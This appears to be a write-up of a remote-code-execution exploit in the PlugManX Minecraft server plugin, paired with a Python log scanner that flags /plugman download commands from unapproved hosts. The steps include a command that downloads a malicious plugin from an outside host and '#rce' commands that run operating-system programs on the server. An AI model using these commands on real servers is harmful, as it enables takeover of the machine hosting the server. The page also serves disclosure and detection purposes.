PlugMan is a simple, easy-to-use plugin that lets server admins manage
plugins from in-game or from the console without restarting the
server. The problem with this plugin is that it allows plugins to be
downloaded from unofficial sites.
How the exploit works
The exploit is based on using the /plugman download command to
download a malicious plugin to compromise the server.
How to use the exploit
The exploit requires the PlugManX /plugman download command to be enabled. With it enabled, enter the following:
01. Download the malicious plugin
In this example, a malicious test plugin that I created is attached.
/plugman download direct https://mcptoolspigotrce.mcptool.net/
02. Test the infected plugin
Check that the plugin has loaded correctly.
#rce help
03. Run a command on the server operating system
Commands can now be executed remotely using the #rce command. In this example I use a command that opens Notepad on my PC, where the server is hosted.
#rce cmd start notepad.exe
Vulnerable versions
Vulnerable versions of this plugin are 2.3.8 and below (since version 2.3.7, the /plugman download command
is disabled by default).
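A defender-side check for the command described above, as an added example that is not part of the original page or of PlugManX: it scans server log lines for /plugman download invocations and flags any whose host is not on an operator-defined allowlist. The "issued server command" log line format, the TRUSTED_HOSTS value and the sample log lines are assumptions.

```python
import re
from urllib.parse import urlparse

# Assumption: hosts the operator has approved for plugin downloads (constructed value).
TRUSTED_HOSTS = {"plugins.example.org"}

# Assumption: player commands are logged as "<player> issued server command: /<cmd>",
# optionally with a "namespace:" prefix before the command name.
CMD_RE = re.compile(
    r"(?P<player>\S+) issued server command: /(?:\w+:)?plugman\s+download\b(?P<args>.*)",
    re.IGNORECASE,
)
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


def find_plugman_downloads(lines, trusted_hosts=TRUSTED_HOSTS):
    """Return one finding per /plugman download invocation found in the log lines."""
    findings = []
    for lineno, line in enumerate(lines, start=1):
        m = CMD_RE.search(line)
        if not m:
            continue
        url_match = URL_RE.search(m.group("args"))
        url = url_match.group(0) if url_match else None
        host = (urlparse(url).hostname or "").lower() if url else None
        findings.append({
            "line": lineno,
            "player": m.group("player"),
            "url": url,
            "host": host,
            # No URL argument or an unapproved host means the entry needs review.
            "trusted": bool(host) and host in trusted_hosts,
        })
    return findings


# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    "[12:00:01 INFO]: Alice issued server command: /plugman list",
    "[12:03:44 INFO]: Bob issued server command: /plugman download direct https://files.example.net/x.jar",
    "[12:05:10 INFO]: Alice issued server command: /plugman download direct https://plugins.example.org/ok.jar",
    "[12:06:30 INFO]: Carol issued server command: /PlugMan:plugman download direct http://203.0.113.7/a.jar",
]

if __name__ == "__main__":
    for f in find_plugman_downloads(SAMPLE_LOG):
        status = "ok" if f["trusted"] else "REVIEW"
        print(f"{status:6} line {f['line']} player={f['player']} url={f['url']}")
```

Any entry marked REVIEW is a reason to inspect the plugins folder for jars that were not installed deliberately.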
Try it yourself
You can download a server with everything you need to test the exploit
locally on your PC from this link.